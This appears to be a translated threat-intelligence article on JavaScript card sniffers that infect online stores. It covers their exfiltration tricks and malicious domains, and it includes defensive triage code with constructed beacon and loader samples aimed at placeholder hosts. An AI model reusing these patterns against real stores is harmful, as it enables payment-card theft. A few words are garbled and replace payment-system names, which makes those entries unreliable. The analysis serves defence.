Four JavaScript sniffers that lie in wait for you in online stores


Almost all of us use online stores, which means that sooner or later we risk becoming victims of JavaScript sniffers: special code that attackers embed in a website to steal bank card data, addresses, logins and passwords from its users.

Almost 400,000 users of the British Airways website and mobile app have already been affected by sniffers, as have visitors to the UK site of the sportswear giant FILA and the American ticket distributor Ticketmaster. PayPal, Chase Paymentech, USAePay, Moneris: these and many other payment systems were affected.

Viktor Okorokov, a Group-IB Threat Intelligence analyst, explains how sniffers are embedded in website code and steal payment information, and which CMS they attack.


"Zowopsa zobisika"

For a long time, JS sniffers stayed out of the field of view of antivirus analysts, and banks and payment systems did not consider them a serious threat. Completely in vain. Group-IB experts analyzed 2,440 infected online stores whose visitors, about 1.5 million people per day in total, were at risk of compromise. The victims include not only users but also the online stores, the payment systems and the banks that issued the compromised cards.

The Group-IB report was the first study of the dark market of sniffers, their infrastructure and their monetization methods, which bring their creators millions of dollars. We identified 38 sniffer families, of which only 12 were previously known to researchers.

Let us look in detail at four of the sniffer families studied in the research.

The ReactGet family

Sniffers of the ReactGet family are used to steal bank card data on online shopping sites. A sniffer of this family can work with a large number of the payment systems used on a site: one version of the sniffer corresponds to one payment system, and certain versions can be used to steal credentials as well as bank card data from the payment forms of several payment systems at once, in the manner of a so-called universal sniffer. In some cases the attackers also carried out phishing attacks against online store administrators in order to gain access to the site's administrative panel.

The campaign using this sniffer family began in May 2017; sites running the Magento, Bigcommerce and Shopify CMS platforms were attacked.

How ReactGet is embedded in the code of an online store

In addition to the "classic" embedding of the script via a link, operators of the ReactGet sniffer family use a special technique: JavaScript code checks whether the current address the user is on meets certain criteria. The malicious code is executed only if the current URL contains the substring checkout, or one of onestep, onepage/, out/onepag, checkout/one, ckout/one. Thus the sniffer code runs exactly at the moment when the user proceeds to pay for the purchase and enters payment details into the form on the site.

This sniffer uses a non-standard technique. The victim's payment and personal data are collected together and encoded with base64, and the resulting string is then used as a parameter in a request to the attackers' website. Most often the path to the gate imitates a JavaScript file, for example resp.js, data.js and so on, but links to image files, GIF and JPG, are also used. The peculiarity is that the sniffer creates an image object of size 1 by 1 pixel and uses the previously built link as the src parameter of the image. That is, in the traffic such a request looks like a request for an ordinary image. A similar technique was used in the ImageID family of sniffers. In addition, the 1-by-1-pixel image technique is used by many legitimate online analytics scripts, which can also mislead the user.
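The exfiltration channel just described (a 1x1 image request whose query string carries a base64 blob of scraped form fields) can be triaged offline from a captured request. The following is an added example written for this page, not code from the article or from the sniffer itself; the host names, the allowlist and the sample payload are constructed placeholders, not domains or data from the report. It decodes any base64-looking query parameter, splits it into key=value pairs and runs a Luhn check on the values to confirm that a real card number is leaving the page.

```javascript
// Added example (not part of the Group-IB article): offline triage of a request
// captured from a checkout page, to decide whether it is the kind of exfiltration
// beacon described above. Everything below is constructed for illustration;
// the host names are placeholders, not domains from the article.

// Hosts the store legitimately talks to (assumed allowlist for this example).
const KNOWN_HOSTS = ['shop.example.com', 'cdn.shop.example.com'];

// Luhn check: the cheapest way to tell a real PAN from a random digit string.
function luhnValid(digits) {
  if (!/^\d{13,19}$/.test(digits)) return false;
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// Decode a query-string value that may be base64 (standard or URL-safe alphabet,
// '+' possibly turned into a space by URL parsing). Returns null when the result
// is not printable text, i.e. the value was not really base64.
function decodeBase64Param(value) {
  const normalized = value.replace(/ /g, '+').replace(/-/g, '+').replace(/_/g, '/');
  if (!/^[A-Za-z0-9+/]+=*$/.test(normalized)) return null;
  const text = Buffer.from(normalized, 'base64').toString('utf8');
  if (text.length === 0) return null;
  const printable = text.replace(/[^\x20-\x7e]/g, '').length;
  return printable / text.length > 0.95 ? text : null;
}

function safeDecodeURIComponent(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

// Parse one beacon URL and report what it carries.
function triageBeacon(rawUrl, knownHosts) {
  const url = new URL(rawUrl);
  const result = {
    host: url.hostname,
    unknownHost: !knownHosts.includes(url.hostname),
    // A 1x1 image request whose path ends in .js/.gif/.jpg is exactly the disguise above.
    looksLikeAsset: /\.(js|gif|jpe?g|png)$/i.test(url.pathname),
    decodedFields: {},
    pans: [],
  };
  for (const [, value] of url.searchParams) {
    const decoded = decodeBase64Param(value);
    if (decoded === null) continue;
    // Sniffers usually serialize the scraped form as key=value pairs joined by '&'.
    for (const pair of decoded.split(/[&\n]/)) {
      const eq = pair.indexOf('=');
      if (eq <= 0) continue;
      const key = safeDecodeURIComponent(pair.slice(0, eq));
      const val = safeDecodeURIComponent(pair.slice(eq + 1));
      result.decodedFields[key] = val;
      const digits = val.replace(/[\s-]/g, '');
      if (luhnValid(digits)) result.pans.push(digits);
    }
  }
  result.suspicious = result.unknownHost && result.pans.length > 0;
  return result;
}

// Constructed sample: what a sniffer would scrape from a checkout form
// (4111 1111 1111 1111 is a well-known test card number, not a real card).
const SAMPLE_PAYLOAD = 'cc_number=4111%201111%201111%201111&cc_cid=123&cc_exp_year=2022&email=jane%40example.com';
const SAMPLE_BEACON = 'https://static-cdn.example.net/data.gif?a=' +
  encodeURIComponent(Buffer.from(SAMPLE_PAYLOAD).toString('base64'));

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triageBeacon(SAMPLE_BEACON, KNOWN_HOSTS), null, 2));
}
```

The allowlist of known hosts is the part that needs tuning per store: a legitimate analytics pixel also ends in .gif and also carries an opaque parameter, so the combination that matters is an unknown host plus a Luhn-valid number in the decoded payload, not the image disguise on its own.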


Version analysis

An analysis of the domains used by the ReactGet sniffers revealed a large number of different versions of this sniffer family. The versions differ in the presence or absence of obfuscation, and in addition each sniffer is designed for a specific payment system that processes bank card payments in online stores. By iterating over the value of the parameter that corresponds to the version number, Group-IB experts obtained a full list of the available versions, and from the names of the form fields that each sniffer searches for on the page they identified the payment systems the sniffer targets.

List of sniffers and their payment systems

Sniffer link Payment system
reactjsapi.com/react.js Authorize.Net
ajaxstatic.com/api.js?v=2.1.1 Wopulumutsa
ajaxstatic.com/api.js?v=2.1.2 Authorize.Net
ajaxstatic.com/api.js?v=2.1.3 Authorize.Net
ajaxstatic.com/api.js?v=2.1.4 eWAY Rapid
ajaxstatic.com/api.js?v=2.1.5 Authorize.Net
ajaxstatic.com/api.js?v=2.1.6 Adyen
ajaxstatic.com/api.js?v=2.1.7 USAePay
ajaxstatic.com/api.js?v=2.1.9 Authorize.Net
apittatus.com/api.js?v=2.1.1 USAePay
apittatus.com/api.js?v=2.1.2 Authorize.Net
apittatus.com/api.js?v=2.1.3 Moneris
apittatus.com/api.js?v=2.1.5 USAePay
apittatus.com/api.js?v=2.1.6 PayPal
apittatus.com/api.js?v=2.1.7 Sage Pay
apittatus.com/api.js?v=2.1.8 Verisign
apittatus.com/api.js?v=2.1.9 PayPal
apittatus.com/api.js?v=2.3.0 Stripe
apittatus.com/api.js?v=3.0.2 Realex
apittatus.com/api.js?v=3.0.3 PayPal
apittatus.com/api.js?v=3.0.4 LinkPoint
apittatus.com/api.js?v=3.0.5 PayPal
apittatus.com/api.js?v=3.0.7 PayPal
apittatus.com/api.js?v=3.0.8 DataCash
apittatus.com/api.js?v=3.0.9 PayPal
asianfoodgracer.com/footer.js Authorize.Net
billgetstatus.com/api.js?v=1.2 Authorize.Net
billgetstatus.com/api.js?v=1.3 Authorize.Net
billgetstatus.com/api.js?v=1.4 Authorize.Net
billgetstatus.com/api.js?v=1.5 Verisign
billgetstatus.com/api.js?v=1.6 Authorize.Net
billgetstatus.com/api.js?v=1.7 Moneris
billgetstatus.com/api.js?v=1.8 Sage Pay
billgetstatus.com/api.js?v=2.0 USAePay
billgetstatus.com/react.js Authorize.Net
Cloudodesc.com/gtm.js?v=1.2 Authorize.Net
Cloudodesc.com/gtm.js?v=1.3 ANZ eGate
Cloudodesc.com/gtm.js?v=2.3 Authorize.Net
Cloudodesc.com/gtm.js?v=2.4 Moneris
Cloudodesc.com/gtm.js?v=2.6 Sage Pay
Cloudodesc.com/gtm.js?v=2.7 Sage Pay
Cloudodesc.com/gtm.js?v=2.8 Chase Paymentech
Cloudodesc.com/gtm.js?v=2.9 Authorize.Net
Cloudodesc.com/gtm.js?v=2.91 Adyen
Cloudodesc.com/gtm.js?v=2.92 PsiGate
Cloudodesc.com/gtm.js?v=2.93 Cybersource
Cloudodesc.com/gtm.js?v=2.95 ANZ eGate
Cloudodesc.com/gtm.js?v=2.97 Realex
geissee.com/gs.js USAePay
gtmproc.com/age.js Authorize.Net
gtmproc.com/gtm.js?v=1.2 Authorize.Net
gtmproc.com/gtm.js?v=1.3 ANZ eGate
gtmproc.com/gtm.js?v=1.5 PayPal
gtmproc.com/gtm.js?v=1.6 PayPal
gtmproc.com/gtm.js?v=1.7 Realex
livecheckpay.com/api.js?v=2.0 Sage Pay
livecheckpay.com/api.js?v=2.1 PayPal
livecheckpay.com/api.js?v=2.2 Verisign
livecheckpay.com/api.js?v=2.3 Authorize.Net
livecheckpay.com/api.js?v=2.4 Verisign
livecheckpay.com/react.js Authorize.Net
livegetpay.com/pay.js?v=2.1.2 ANZ eGate
livegetpay.com/pay.js?v=2.1.3 PayPal
livegetpay.com/pay.js?v=2.1.5 Cybersource
livegetpay.com/pay.js?v=2.1.7 Authorize.Net
livegetpay.com/pay.js?v=2.1.8 Sage Pay
livegetpay.com/pay.js?v=2.1.9 Realex
livegetpay.com/pay.js?v=2.2.0 Cybersource
livegetpay.com/pay.js?v=2.2.1 PayPal
livegetpay.com/pay.js?v=2.2.2 PayPal
livegetpay.com/pay.js?v=2.2.3 PayPal
livegetpay.com/pay.js?v=2.2.4 Verisign
livegetpay.com/pay.js?v=2.2.5 eWAY Rapid
livegetpay.com/pay.js?v=2.2.7 Sage Pay
livegetpay.com/pay.js?v=2.2.8 Sage Pay
livegetpay.com/pay.js?v=2.2.9 Verisign
livegetpay.com/pay.js?v=2.3.0 Authorize.Net
livegetpay.com/pay.js?v=2.3.1 Authorize.Net
livegetpay.com/pay.js?v=2.3.2 First Data Global Gateway
livegetpay.com/pay.js?v=2.3.3 Authorize.Net
livegetpay.com/pay.js?v=2.3.4 Authorize.Net
livegetpay.com/pay.js?v=2.3.5 Moneris
livegetpay.com/pay.js?v=2.3.6 Authorize.Net
livegetpay.com/pay.js?v=2.3.8 PayPal
livegetpay.com/pay.js?v=2.4.0 Verisign
maxstatics.com/site.js USAePay
mediapack.info/track.js?d=funlove.com USAePay
mediapack.info/track.js?d=qbedding.com Authorize.Net
mediapack.info/track.js?d=vseyewear.com Verisign
mxcounter.com/c.js?v=1.2 PayPal
mxcounter.com/c.js?v=1.3 Authorize.Net
mxcounter.com/c.js?v=1.4 Stripe
mxcounter.com/c.js?v=1.6 Authorize.Net
mxcounter.com/c.js?v=1.7 eWAY Rapid
mxcounter.com/c.js?v=1.8 Sage Pay
mxcounter.com/c.js?v=2.0 Authorize.Net
mxcounter.com/c.js?v=2.1 Braintree
mxcounter.com/c.js?v=2.10 Braintree
mxcounter.com/c.js?v=2.2 PayPal
mxcounter.com/c.js?v=2.3 Sage Pay
mxcounter.com/c.js?v=2.31 Sage Pay
mxcounter.com/c.js?v=2.32 Authorize.Net
mxcounter.com/c.js?v=2.33 PayPal
mxcounter.com/c.js?v=2.34 Authorize.Net
mxcounter.com/c.js?v=2.35 Verisign
mxcounter.com/click.js?v=1.2 PayPal
mxcounter.com/click.js?v=1.3 Authorize.Net
mxcounter.com/click.js?v=1.4 Stripe
mxcounter.com/click.js?v=1.6 Authorize.Net
mxcounter.com/click.js?v=1.7 eWAY Rapid
mxcounter.com/click.js?v=1.8 Sage Pay
mxcounter.com/click.js?v=2.0 Authorize.Net
mxcounter.com/click.js?v=2.1 Braintree
mxcounter.com/click.js?v=2.2 PayPal
mxcounter.com/click.js?v=2.3 Sage Pay
mxcounter.com/click.js?v=2.31 Sage Pay
mxcounter.com/click.js?v=2.32 Authorize.Net
mxcounter.com/click.js?v=2.33 PayPal
mxcounter.com/click.js?v=2.34 Authorize.Net
mxcounter.com/click.js?v=2.35 Verisign
mxcounter.com/cnt.js Authorize.Net
mxcounter.com/j.js Authorize.Net
newrelicnet.com/api.js?v=1.2 Authorize.Net
newrelicnet.com/api.js?v=1.4 Authorize.Net
newrelicnet.com/api.js?v=1.8 Sage Pay
newrelicnet.com/api.js?v=4.5 Sage Pay
newrelicnet.com/api.js?v=4.6 Westpac PayWay
nr-public.com/api.js?v=2.0 PayFort
nr-public.com/api.js?v=2.1 PayPal
nr-public.com/api.js?v=2.2 Authorize.Net
nr-public.com/api.js?v=2.3 Stripe
nr-public.com/api.js?v=2.4 First Data Global Gateway
nr-public.com/api.js?v=2.5 PsiGate
nr-public.com/api.js?v=2.6 Authorize.Net
nr-public.com/api.js?v=2.7 Authorize.Net
nr-public.com/api.js?v=2.8 Moneris
nr-public.com/api.js?v=2.9 Authorize.Net
nr-public.com/api.js?v=3.1 Sage Pay
nr-public.com/api.js?v=3.2 Verisign
nr-public.com/api.js?v=3.3 Moneris
nr-public.com/api.js?v=3.5 PayPal
nr-public.com/api.js?v=3.6 LinkPoint
nr-public.com/api.js?v=3.7 Westpac PayWay
nr-public.com/api.js?v=3.8 Authorize.Net
nr-public.com/api.js?v=4.0 Moneris
nr-public.com/api.js?v=4.0.2 PayPal
nr-public.com/api.js?v=4.0.3 Adyen
nr-public.com/api.js?v=4.0.4 PayPal
nr-public.com/api.js?v=4.0.5 Authorize.Net
nr-public.com/api.js?v=4.0.6 USAePay
nr-public.com/api.js?v=4.0.7 EBizCharge
nr-public.com/api.js?v=4.0.8 Authorize.Net
nr-public.com/api.js?v=4.0.9 Verisign
nr-public.com/api.js?v=4.1.2 Verisign
ordercheckpays.com/api.js?v=2.11 Authorize.Net
ordercheckpays.com/api.js?v=2.12 PayPal
ordercheckpays.com/api.js?v=2.13 Moneris
ordercheckpays.com/api.js?v=2.14 Authorize.Net
ordercheckpays.com/api.js?v=2.15 PayPal
ordercheckpays.com/api.js?v=2.16 PayPal
ordercheckpays.com/api.js?v=2.17 Westpac PayWay
ordercheckpays.com/api.js?v=2.18 Authorize.Net
ordercheckpays.com/api.js?v=2.19 Authorize.Net
ordercheckpays.com/api.js?v=2.21 Sage Pay
ordercheckpays.com/api.js?v=2.22 Verisign
ordercheckpays.com/api.js?v=2.23 Authorize.Net
ordercheckpays.com/api.js?v=2.24 PayPal
ordercheckpays.com/api.js?v=2.25 PayFort
ordercheckpays.com/api.js?v=2.29 Cybersource
ordercheckpays.com/api.js?v=2.4 PayPal Payflow Pro
ordercheckpays.com/api.js?v=2.7 Authorize.Net
ordercheckpays.com/api.js?v=2.8 Authorize.Net
ordercheckpays.com/api.js?v=2.9 Verisign
ordercheckpays.com/api.js?v=3.1 Authorize.Net
ordercheckpays.com/api.js?v=3.2 Authorize.Net
ordercheckpays.com/api.js?v=3.3 Sage Pay
ordercheckpays.com/api.js?v=3.4 Authorize.Net
ordercheckpays.com/api.js?v=3.5 Stripe
ordercheckpays.com/api.js?v=3.6 Authorize.Net
ordercheckpays.com/api.js?v=3.7 Authorize.Net
ordercheckpays.com/api.js?v=3.8 Verisign
ordercheckpays.com/api.js?v=3.9 PayPal
ordercheckpays.com/api.js?v=4.0 Authorize.Net
ordercheckpays.com/api.js?v=4.1 Authorize.Net
ordercheckpays.com/api.js?v=4.2 Sage Pay
ordercheckpays.com/api.js?v=4.3 Authorize.Net
reactjsapi.com/api.js?v=0.1.0 Authorize.Net
reactjsapi.com/api.js?v=0.1.1 PayPal
reactjsapi.com/api.js?v=4.1.2 mwala
reactjsapi.com/api.js?v=4.1.4 PayPal
reactjsapi.com/api.js?v=4.1.5 Sage Pay
reactjsapi.com/api.js?v=4.1.51 Verisign
reactjsapi.com/api.js?v=4.1.6 Authorize.Net
reactjsapi.com/api.js?v=4.1.7 Authorize.Net
reactjsapi.com/api.js?v=4.1.8 Stripe
reactjsapi.com/api.js?v=4.1.9 Zovuta Zebra
reactjsapi.com/api.js?v=4.2.0 Sage Pay
reactjsapi.com/api.js?v=4.2.1 Authorize.Net
reactjsapi.com/api.js?v=4.2.2 First Data Global Gateway
reactjsapi.com/api.js?v=4.2.3 Authorize.Net
reactjsapi.com/api.js?v=4.2.4 eWAY Rapid
reactjsapi.com/api.js?v=4.2.5 Adyen
reactjsapi.com/api.js?v=4.2.7 PayPal
reactjsapi.com/api.js?v=4.2.8 QuickBooks Merchant Services
reactjsapi.com/api.js?v=4.2.9 Verisign
reactjsapi.com/api.js?v=4.2.91 Sage Pay
reactjsapi.com/api.js?v=4.2.92 Verisign
reactjsapi.com/api.js?v=4.2.94 Authorize.Net
reactjsapi.com/api.js?v=4.3.97 Authorize.Net
reactjsapi.com/api.js?v=4.5 Sage Pay
reactjsapi.com/react.js Authorize.Net
sydneysalonsupplies.com/gtm.js eWAY Rapid
tagsmediaget.com/react.js Authorize.Net
tagstracking.com/tag.js?v=2.1.2 ANZ eGate
tagstracking.com/tag.js?v=2.1.3 PayPal
tagstracking.com/tag.js?v=2.1.5 Cybersource
tagstracking.com/tag.js?v=2.1.7 Authorize.Net
tagstracking.com/tag.js?v=2.1.8 Sage Pay
tagstracking.com/tag.js?v=2.1.9 Realex
tagstracking.com/tag.js?v=2.2.0 Cybersource
tagstracking.com/tag.js?v=2.2.1 PayPal
tagstracking.com/tag.js?v=2.2.2 PayPal
tagstracking.com/tag.js?v=2.2.3 PayPal
tagstracking.com/tag.js?v=2.2.4 Verisign
tagstracking.com/tag.js?v=2.2.5 eWAY Rapid
tagstracking.com/tag.js?v=2.2.7 Sage Pay
tagstracking.com/tag.js?v=2.2.8 Sage Pay
tagstracking.com/tag.js?v=2.2.9 Verisign
tagstracking.com/tag.js?v=2.3.0 Authorize.Net
tagstracking.com/tag.js?v=2.3.1 Authorize.Net
tagstracking.com/tag.js?v=2.3.2 First Data Global Gateway
tagstracking.com/tag.js?v=2.3.3 Authorize.Net
tagstracking.com/tag.js?v=2.3.4 Authorize.Net
tagstracking.com/tag.js?v=2.3.5 Moneris
tagstracking.com/tag.js?v=2.3.6 Authorize.Net
tagstracking.com/tag.js?v=2.3.8 PayPal

Password sniffer

One of the advantages of JavaScript sniffers that run on the client side of a website is their versatility: malicious code embedded in a site can steal data of any kind, whether payment details or the login and password of a user account. Group-IB experts found a sample of a ReactGet family sniffer designed to steal the email addresses and passwords of a site's users.


Overlap with the ImageID sniffer

During the analysis of one of the infected stores it turned out that its site had been infected twice: in addition to the malicious code of the ReactGet family, the code of an ImageID family sniffer was found. This overlap may be evidence that the operators behind both sniffers use similar methods to inject malicious code.


Universal sniffer

An analysis of one of the domain names associated with the ReactGet sniffer infrastructure showed that the same user had registered three other domain names. These three domains imitated the domains of real websites and had previously been used to host sniffers. When analyzing the code of three legitimate sites, a previously unknown sniffer was found, and further analysis showed that it was an improved version of the ReactGet sniffer. All previously observed versions of this sniffer family targeted a single payment system, that is, each payment system required a special version of the sniffer. In this case, however, a universal version of the sniffer was found that is able to steal information from the forms of 15 different payment systems and e-commerce modules for making online payments.

At the start of its work, the sniffer searched for the basic form fields containing the victim's personal information: full name, physical address, phone number.

The sniffer then searched for 15 different field-name prefixes corresponding to different payment systems and online payment modules.

The victim's personal information and payment data were then collected together and sent to a site controlled by the attacker. In this case two versions of the universal ReactGet sniffer were found, located on two different compromised sites, but both versions sent the stolen data to the same compromised site, zoobashop.com.

An analysis of the prefixes the sniffer used to search for fields containing the victim's payment information allowed us to determine that this sniffer sample targeted the following payment systems:

  • Authorize.Net
  • Verisign
  • First Data
  • USAePay
  • Stripe
  • PayPal
  • ANZ eGate
  • Braintree
  • DataCash (MasterCard)
  • Realex Payments
  • PsiGate
  • Heartland Payment Systems

What tools are used to steal payment information?

The first tool, found during the analysis of the attackers' infrastructure, is used to obfuscate the malicious scripts that steal bank card data. A bash script that calls the CLI of the javascript-obfuscator project to automate the obfuscation of sniffer code was found on one of the attackers' hosts.

The second tool found is designed to generate the code responsible for loading the main sniffer. This tool generates JavaScript code that checks whether the user is on a payment page by searching the user's current address for the strings checkout, cart and so on, and if the result is positive, the code loads the main sniffer from the attackers' server. To hide the malicious activity, all the strings, including the test strings used to recognize the payment page and the link to the sniffer, are base64 encoded.
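A loader of the kind the generator produces gives itself away precisely by those base64-encoded literals: decode them and you recover both the trigger substrings and the gate URL without executing anything. The following is an added example written for this page, not the attackers' generator nor code from the article; SAMPLE_LOADER is a constructed, inert stand-in for such a loader and the gate host in it is a placeholder, not a domain from the report.

```javascript
// Added example (not the attackers' generator, nor code from the article): a static
// triage helper that pulls base64-encoded string literals out of a loader script and
// decodes them, separating the checkout-page trigger strings from the gate URL.
// SAMPLE_LOADER is a constructed, inert stand-in for such a loader; the gate host
// is a placeholder, not a domain from the article.

const b64 = (s) => Buffer.from(s, 'utf8').toString('base64');

// Constructed loader: every literal is base64, decoded at runtime with atob().
const SAMPLE_LOADER = [
  'var k=["' + b64('checkout') + '","' + b64('onepage') + '","' + b64('cart') + '"];',
  'var g="' + b64('https://static-cdn.example.net/api.js?v=2.1.1') + '";',
  'function d(s){return atob(s)}',
  'for(var i=0;i<k.length;i++){if(location.href.indexOf(d(k[i]))!==-1){',
  '  var s=document.createElement("script");s.src=d(g);document.head.appendChild(s);}}',
].join('\n');

// Find quoted literals that are well-formed base64 and decode to printable text.
// Short identifiers like "cart" are also valid base64 but decode to binary,
// so the length and printable tests filter them out.
function extractBase64Literals(source, minLength = 8) {
  const found = [];
  const literal = /(["'])((?:\\.|(?!\1)[^\\\n])*)\1/g;
  let m;
  while ((m = literal.exec(source)) !== null) {
    const s = m[2];
    if (s.length < minLength || s.length % 4 !== 0) continue;
    if (!/^[A-Za-z0-9+/]+={0,2}$/.test(s)) continue;
    const decoded = Buffer.from(s, 'base64').toString('utf8');
    if (!/^[\x20-\x7e]+$/.test(decoded)) continue;
    found.push({ encoded: s, decoded });
  }
  return found;
}

// Split the decoded literals into gate URLs and URL-match trigger strings, and
// note the two runtime traits such loaders share: atob() and a dynamic <script>.
function classifyLoader(source) {
  const literals = extractBase64Literals(source);
  const isUrl = (s) => /^https?:\/\//i.test(s);
  return {
    gates: literals.filter((l) => isUrl(l.decoded)).map((l) => l.decoded),
    triggers: literals.filter((l) => !isUrl(l.decoded)).map((l) => l.decoded),
    decodesAtRuntime: /\batob\s*\(/.test(source),
    loadsScriptDynamically: /createElement\s*\(\s*["']script["']\s*\)/.test(source),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(classifyLoader(SAMPLE_LOADER));
}
```

Run it over every inline script and every third-party script a checkout page pulls in; a script that decodes a URL at runtime and only then creates a script element is worth a manual look even when none of the decoded strings is obviously malicious, since the same shape appears once the loader has been passed through javascript-obfuscator.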


Phishing attacks

An analysis of the attackers' network infrastructure showed that the criminal group often uses phishing to gain access to the administrative panel of a target online store. The attackers register a domain that visually resembles the store's domain and deploy a fake Magento admin panel login form on it. If this succeeds, the attackers obtain access to the administrative panel of the Magento CMS, which lets them edit the site's components and deploy a sniffer to steal credit card data.

Infrastructure

Domain Date of detection/appearance
mediapack.info 04.05.2017
adsgetapi.com 15.06.2017
simcounter.com 14.08.2017
mageanalytics.com 22.12.2017
maxstatics.com 16.01.2018
reactjsapi.com 19.01.2018
mxcounter.com 02.02.2018
apittatus.com 01.03.2018
orderracker.com 20.04.2018
tagstracking.com 25.06.2018
adsapigate.com 12.07.2018
trust-tracker.com 15.07.2018
fbstatspartner.com 02.10.2018
billgetstatus.com 12.10.2018
www.aldenmlilhouse.com 20.10.2018
balletbeautlful.com 20.10.2018
bargalnjunkie.com 20.10.2018
payselector.com 21.10.2018
tagsmediaget.com 02.11.2018
hs-payments.com 16.11.2018
ordercheckpays.com 19.11.2018
geissee.com 24.11.2018
gtmproc.com 29.11.2018
livegetpay.com 18.12.2018
sydneysalonsupplies.com 18.12.2018
newrelicnet.com 19.12.2018
nr-public.com 03.01.2019
cloudodesc.com 04.01.2019
ajaxstatic.com 11.01.2019
livecheckpay.com 21.01.2019
asianfoodgracer.com 25.01.2019

The G-Analytics family

This sniffer family is used to steal the cards of online store customers. The first domain name used by the group was registered in April 2016, which may indicate that the group began its activity in mid-2016.

In its current campaign, the group uses domain names that imitate real services, such as Google Analytics and jQuery, disguising the sniffer's activity behind legitimate-looking scripts and domain names that resemble legitimate ones. Sites running the Magento CMS were attacked.

How G-Analytics is embedded in the code of an online store

A distinctive feature of this family is the use of several different methods of stealing payment information. In addition to the classic JavaScript injection on the client side of the site, the criminal group also used code injection on the server side, namely PHP scripts that process the data entered by the user. This technique is dangerous because it makes it harder for third-party researchers to detect the malicious code. Group-IB experts found a version of the sniffer embedded in the site's PHP code that used the domain dittm.org as its gate.

An early version of the sniffer was also found that uses the same domain, dittm.org, to collect the stolen data, but this version was designed to be installed on the client side of the online store.

Later the group changed its tactics and began to pay more attention to hiding and disguising its malicious activity.

In early 2017 the group started using the domain jquery-js.com, disguised as a jQuery CDN: a user who visits the attackers' site is redirected to the legitimate site jquery.com.

And in mid-2018 the group adopted the domain name g-analytics.com and began to disguise the sniffer's activity as the legitimate Google Analytics service.


Version analysis

During the analysis of the domains used to host the sniffer code, it was found that the site holds a large number of versions, which differ in the presence of obfuscation and in the presence or absence of unreachable code added to the file to distract attention and hide the malicious code.

In total, six versions of the sniffer were identified on the jquery-js.com site. These sniffers send the stolen data to an address on the same site as the sniffer itself, hxxps://jquery-js[.]com/latest/jquery.min.js:

  • hxxps://jquery-js[.]com/jquery.min.js
  • hxxps://jquery-js[.]com/jquery.2.2.4.min.js
  • hxxps://jquery-js[.]com/jquery.1.8.3.min.js
  • hxxps://jquery-js[.]com/jquery.1.6.4.min.js
  • hxxps://jquery-js[.]com/jquery.1.4.4.min.js
  • hxxps://jquery-js[.]com/jquery.1.12.4.min.js

The domain g-analytics.com, used by the group in attacks since mid-2018, serves as a repository for a larger number of sniffers. In total, 16 different versions of the sniffer were found. In this case the gate for sending the stolen data was disguised as a link to a GIF image: hxxp://g-analytics[.]com/__utm.gif?v=1&_v=j68&a=98811130&t=pageview&_s=1&sd=24-bit&sr=2560×1440&vp=2145×371&je=0&_u=AACAAEAB~&jid=1841704724&gjid=877686936&cid=1283183910.1527732071:

  • hxxps://g-analytics[.]com/libs/1.0.1/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.10/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.11/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.12/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.13/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.14/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.15/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.16/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.3/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.4/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.5/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.6/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.7/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.8/analytics.js
  • hxxps://g-analytics[.]com/libs/1.0.9/analytics.js
  • hxxps://g-analytics[.]com/libs/analytics.js

Monetization of the stolen data

The criminal group monetizes the stolen data by selling the cards through a specially created underground store that serves carders. An analysis of the domains used by the attackers allowed us to determine that google-analytics.cm was registered by the same user as the domain cardz.vc. The domain cardz.vc refers to the Cardsurfs (Flysurfs) store selling stolen bank cards, which gained popularity back in the days of the AlphaBay underground marketplace as a store selling bank cards stolen with a sniffer.

While analyzing the domain analytical.is, located on the same server as the domains the sniffers use to collect stolen data, Group-IB experts found a file containing cookie-stealing logs, apparently abandoned later by the malware developer. One of the entries in the log contained the domain iozoz.com, which had previously been used in one of the sniffers active in 2016. Presumably this domain was used earlier by the attacker to collect cards stolen with the sniffer. The domain was registered to the email address [email protected], which was also used to register the domains cardz.su and cardz.vc, related to the Cardsurfs carding store.

Based on the data obtained, it can be assumed that the G-Analytics sniffer family and the Cardsurfs underground bank card store are run by the same people, and that the store is used to sell bank cards stolen with the sniffer.

Infrastructure

Domain Date of detection/appearance
iozoz.com 08.04.2016
dittm.org 10.09.2016
jquery-js.com 02.01.2017
g-analytics.com 31.05.2018
google-analytics.is 21.11.2018
analytical.to 04.12.2018
google-analytics.to 06.12.2018
google-analytics.cm 28.12.2018
analytical.is 28.12.2018
google-analytics.cm 17.01.2019

The Illum family

Illum is a sniffer family used to attack online stores running the Magento CMS. In addition to embedding malicious code, the operators of this sniffer also deploy fake payment forms that send data to gates controlled by the attackers.

During the analysis of the network infrastructure used by the operators of this sniffer, a large number of malicious scripts, exploits and fake payment forms were found, as well as a collection of malicious sniffer samples from competitors. Based on the dates of appearance of the domain names used by the group, it can be assumed that the campaign began in late 2016.

How Illum is embedded in the code of an online store

The first versions of the sniffer found were embedded directly in the code of the compromised site. The stolen data was sent to cdn.illum[.]pw/records.php; the gate address was base64 encoded.

Later, a packed version of the sniffer was found that uses a different gate, records.nstatistics[.]com/records.php.

According to a report by Willem de Groot, the host used in the sniffer was deployed on the website of the store of the German political party CSU.

Analysis of the attackers' website

Group-IB experts found and analyzed a website used by the criminal group to store tools and collect stolen information.

Among the tools found on the attackers' server were scripts and exploits for privilege escalation in Linux: for example, the Linux Privilege Escalation Check Script developed by Mike Czumak, as well as an exploit for CVE-2009-1185.

The attackers used two exploits directly against online stores: the first is capable of injecting malicious code into core_config_data using CVE-2016-4010, the second exploits an RCE vulnerability in Magento CMS plugins, allowing arbitrary code to be executed on the vulnerable web server.
